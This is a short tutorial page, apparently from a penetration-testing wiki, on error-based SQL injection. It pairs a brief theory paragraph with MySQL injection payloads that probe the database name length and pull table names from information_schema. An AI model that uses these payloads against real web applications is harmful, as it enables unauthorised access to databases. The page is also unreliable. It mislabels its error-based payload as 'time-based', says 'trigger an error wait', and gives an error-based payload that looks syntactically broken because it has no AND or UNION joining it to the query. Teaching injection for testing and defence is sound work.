Infiltr8ForumGitHub

Error Based

Theory

Error-based SQLi is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database. In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database. While errors are very useful during the development phase of a web application, they should be disabled on a live site, or logged to a file with restricted access instead.

Practice

The process is relatively the same as Boolean Based injection. All you have to do is modify the payloads to trigger an error wait.

A time-based SQLi payload in MySQL will look like this

1' SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')--

Examples:

#Boolean Based  
1' AND (SELECT LENGTH(database()))=1-- -

#Error Based  
1' SELECT IF((SELECT LENGTH(database()))=1,(SELECT table_name FROM information_schema.tables),'a')--

Last updated

Was this helpful?